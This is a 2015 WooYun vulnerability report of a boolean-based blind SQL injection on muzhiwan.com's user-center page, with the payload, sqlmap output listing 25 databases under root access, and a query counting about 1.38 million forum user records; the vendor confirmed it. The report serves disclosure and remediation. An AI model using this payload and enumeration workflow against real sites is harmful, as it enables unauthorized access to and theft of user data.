漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0147726
漏洞标题:拇指玩主站SQL注入影响百万用户数据
相关厂商:muzhiwan.com
漏洞作者: 路人甲
提交时间:2015-10-19 11:57
修复时间:2015-12-03 12:02
公开时间:2015-12-03 12:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开
简要描述:
拇指玩主站注入影响百万用户数据
详细说明:
注入点位于主站用户中心->修改手机型号处
mysql bool 盲注
漏洞证明:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=album&aid=1 or 1=1-if(1=1 AND 4174=4174 ,0,(select 1 union select 2))
---
[03:12:54] [INFO] testing MySQL
[03:12:54] [INFO] confirming MySQL
[03:12:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[03:12:54] [INFO] fetching database names
[03:12:54] [INFO] fetching number of databases
[03:12:54] [INFO] resumed: 25
[03:12:54] [INFO] resumed: information_schema
[03:12:54] [INFO] resumed: anquanxia
[03:12:54] [INFO] resumed: applanet_user
[03:12:54] [INFO] resumed: bug
[03:12:54] [INFO] resumed: googleinstall
[03:12:54] [INFO] resumed: googlemarket
[03:12:54] [INFO] resumed: googlemarketgame
[03:12:54] [INFO] resumed: muzhiwan
[03:12:54] [INFO] resumed: muzhiwan130409
[03:12:54] [INFO] resumed: muzhiwan130417
[03:12:54] [INFO] resumed: muzhiwanbbs
[03:12:54] [INFO] resumed: muzhiwanbbstest
[03:12:54] [INFO] resumed: muzhiwantest
[03:12:54] [INFO] resumed: mysql
[03:12:54] [INFO] resumed: mzw
[03:12:54] [INFO] resumed: mzw_new_gz
[03:12:54] [INFO] resumed: mzw_oa
[03:12:54] [INFO] resumed: mzwtest
[03:12:54] [INFO] resumed: redmine
[03:12:54] [INFO] resumed: sdk
[03:12:54] [INFO] resumed: stat
[03:12:54] [INFO] resumed: stat_sdk
[03:12:54] [INFO] resumed: test
[03:12:54] [INFO] resumed: testlink
[03:12:54] [INFO] resumed: wikidatabase
available databases [25]:
[*] anquanxia
[*] applanet_user
[*] bug
[*] googleinstall
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase
root权限,貌似所有数据库都在了。
看看用户表
sql-shell> select count(*) from muzhiwanbbs.pre_ucenter_members
[03:05:24] [INFO] fetching SQL SELECT statement query output: 'select count(*) from muzhiwanbbs.pre_ucenter_members'
[03:05:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:05:24] [INFO] retrieved: 1386124
select count(*) from muzhiwanbbs.pre_ucenter_members: '1386124'
sql-shell> select count(*) from mzw.mzw_users
影响138w论坛用户数据
修复方案:
你懂
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-10-19 12:00
厂商回复:
谢谢,我们会尽快修复
最新状态:
暂无